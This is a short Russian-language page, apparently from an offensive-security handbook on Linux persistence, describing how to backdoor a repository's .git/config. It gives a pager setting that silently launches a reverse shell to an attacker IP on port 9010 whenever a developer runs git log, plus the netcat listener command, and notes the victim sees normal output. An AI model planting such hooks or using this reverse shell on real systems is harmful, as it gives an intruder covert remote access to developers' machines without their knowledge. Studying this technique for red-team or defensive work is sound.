> For the complete documentation index, see [llms.txt](https://reeves0x0.gitbook.io/linux-under-attack/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://reeves0x0.gitbook.io/linux-under-attack/persistence/11-git-config.md).

# 11 - Git config

В .git/config есть переменные среды, их можно настроить на выполнение вредоносных команд, когда должно произойти какое-либо действие.\
Для git log  соответствует переменная среды GIT\_PAGER.

```bash
// Правим .git/config
pager = nohup bash -c 'bash -i >& /dev/tcp/192.168.140.128/9010 0>&1' > /dev/null 2>&1 & ${PAGER:-less}

// На атакующем хосте поднимаем netcat 
nc -vln 9010
```

теперь когда разраотчик вызовет git log, он увидит лог, а мы получим шелл

<figure><img src="/files/1N4M8MqFvmm5Y8m7BGJZ" alt=""><figcaption></figcaption></figure>
